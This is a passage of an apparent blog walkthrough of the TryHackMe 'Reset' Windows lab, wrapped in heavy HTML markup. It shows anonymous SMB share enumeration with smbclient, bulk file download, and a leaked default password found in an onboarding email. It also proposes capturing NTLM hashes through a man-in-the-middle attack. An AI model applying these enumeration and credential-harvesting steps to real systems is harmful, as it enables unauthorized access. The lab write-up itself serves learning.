#BABED8\">      <\/span><span style=\"color: #C3E88D\">Remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Admin<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">C$<\/span><span style=\"color: #BABED8\">              <\/span><span style=\"color: #C3E88D\">Disk<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">Default<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">share<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">Data<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #C3E88D\">Disk<\/span><span style=\"color: #BABED8\">      <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">IPC$<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #C3E88D\">IPC<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">Remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">NETLOGON<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">Disk<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">Logon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">share<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">SYSVOL<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Disk<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">Logon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">share<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Reconnecting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SMB1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">workgroup<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">listing.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">do_connect:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Connection<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.77.111<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">failed<\/span><span style=\"color: #BABED8\"> (Error <\/span><span style=\"color: #C3E88D\">NT_STATUS_RESOURCE_NAME_NOT_FOUND<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Unable<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">connect<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SMB1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">--<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">no<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">workgroup<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">available<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The Data share looks interesting since all other shares are common on a Windows machine. Let&#8217;s try connecting since Anonymous login is allowed.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ smbclient \\\\\\\\10.10.77.111\\\\Data\nPassword for [WORKGROUP\\ishsome]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  .                                   D        0  Wed Jul 19 03:40:57 2023\n  ..                                  D        0  Wed Jul 19 03:40:57 2023\n  onboarding                          D        0  Sun Jan 28 16:53:13 2024\n\n\t\t7863807 blocks of size 4096. 3024809 blocks available\nsmb: \\&gt; cd onboarding\\\nsmb: \\onboarding\\&gt; dir\n  .                                   D        0  Sun Jan 28 16:53:43 2024\n  ..                                  D        0  Sun Jan 28 16:53:43 2024\n  bvpfsbqm.41v.txt                    A      521  Mon Aug 21 13:21:59 2023\n  n0orcaea.agj.pdf                    A  4700896  Mon Jul 17 03:11:53 2023\n  oaovyta4.spy.pdf                    A  3032659  Mon Jul 17 03:12:09 2023\n\n\t\t7863807 blocks of size 4096. 3024777 blocks available\nsmb: \\onboarding\\&gt; \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smbclient<\/span><span style=\"color: #BABED8\"> \\\\\\\\<\/span><span style=\"color: #C3E88D\">10.10.77.111<\/span><span style=\"color: #BABED8\">\\\\<\/span><span style=\"color: #C3E88D\">Data<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> [WORKGROUP\\ishsome]:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Try<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">help<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">get<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">a<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">list<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">possible<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commands.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\&gt; <\/span><span style=\"color: #C3E88D\">dir<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">                                   <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Wed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">19<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:40:57<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">                                  <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Wed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">19<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:40:57<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">onboarding<\/span><span style=\"color: #BABED8\">                          <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">16<\/span><span style=\"color: #C3E88D\">:53:13<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #FFCB6B\">7863807<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">blocks<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">size<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4096<\/span><span style=\"color: #C3E88D\">.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3024809<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">blocks<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">available<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\&gt; <\/span><span style=\"color: #C3E88D\">cd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">onboarding<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">smb: \\o<\/span><span style=\"color: #C3E88D\">nboarding<\/span><span style=\"color: #BABED8\">\\&gt; <\/span><span style=\"color: #C3E88D\">dir<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">                                   <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">16<\/span><span style=\"color: #C3E88D\">:53:43<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">                                  <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">16<\/span><span style=\"color: #C3E88D\">:53:43<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">bvpfsbqm.41v.txt<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #F78C6C\">521<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Aug<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">13<\/span><span style=\"color: #C3E88D\">:21:59<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">n0orcaea.agj.pdf<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">4700896<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:11:53<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">oaovyta4.spy.pdf<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">3032659<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:12:09<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #FFCB6B\">7863807<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">blocks<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">size<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4096<\/span><span style=\"color: #C3E88D\">.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3024777<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">blocks<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">available<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\o<\/span><span style=\"color: #C3E88D\">nboarding<\/span><span style=\"color: #BABED8\">\\&gt; <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s get all the files and check them out.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"smb: \\onboarding\\&gt; dir\n  .                                   D        0  Sun Jan 28 16:55:13 2024\n  ..                                  D        0  Sun Jan 28 16:55:13 2024\n  i4qjzpvg.5ik.pdf                    A  4700896  Mon Jul 17 03:11:53 2023\n  rbckog2o.o4o.txt                    A      521  Mon Aug 21 13:21:59 2023\n  vgtigkky.vhc.pdf                    A  3032659  Mon Jul 17 03:12:09 2023\n\n\t\t7863807 blocks of size 4096. 3024624 blocks available\n\t\t\nsmb: \\onboarding\\&gt; prompt OFF \nsmb: \\onboarding\\&gt; recurse ON\nsmb: \\onboarding\\&gt; mget *\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\o<\/span><span style=\"color: #C3E88D\">nboarding<\/span><span style=\"color: #BABED8\">\\&gt; <\/span><span style=\"color: #C3E88D\">dir<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">                                   <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">16<\/span><span style=\"color: #C3E88D\">:55:13<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">                                  <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">16<\/span><span style=\"color: #C3E88D\">:55:13<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">i4qjzpvg.5ik.pdf<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">4700896<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:11:53<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">rbckog2o.o4o.txt<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #F78C6C\">521<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Aug<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">13<\/span><span style=\"color: #C3E88D\">:21:59<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">vgtigkky.vhc.pdf<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">3032659<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:12:09<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #FFCB6B\">7863807<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">blocks<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">size<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4096<\/span><span style=\"color: #C3E88D\">.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3024624<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">blocks<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">available<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\o<\/span><span style=\"color: #C3E88D\">nboarding<\/span><span style=\"color: #BABED8\">\\&gt; <\/span><span style=\"color: #C3E88D\">prompt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OFF<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\o<\/span><span style=\"color: #C3E88D\">nboarding<\/span><span style=\"color: #BABED8\">\\&gt; <\/span><span style=\"color: #C3E88D\">recurse<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ON<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\o<\/span><span style=\"color: #C3E88D\">nboarding<\/span><span style=\"color: #BABED8\">\\&gt; <\/span><span style=\"color: #C3E88D\">mget<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #BABED8\">*<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Every time we run the dir command, the file names are changing. There is a process running constantly that is changing the file names. If we can do an MITM attack, we might be able to grab the NTLM hash of the user.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/SMB]\n\u2514\u2500$ cat rbckog2o.o4o.txt \nSubject: Welcome to Reset -\ufffdDear &lt;USER&gt;,Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.The initial passowrd is: ResetMe123!We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.Best regards,The Reset Team\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 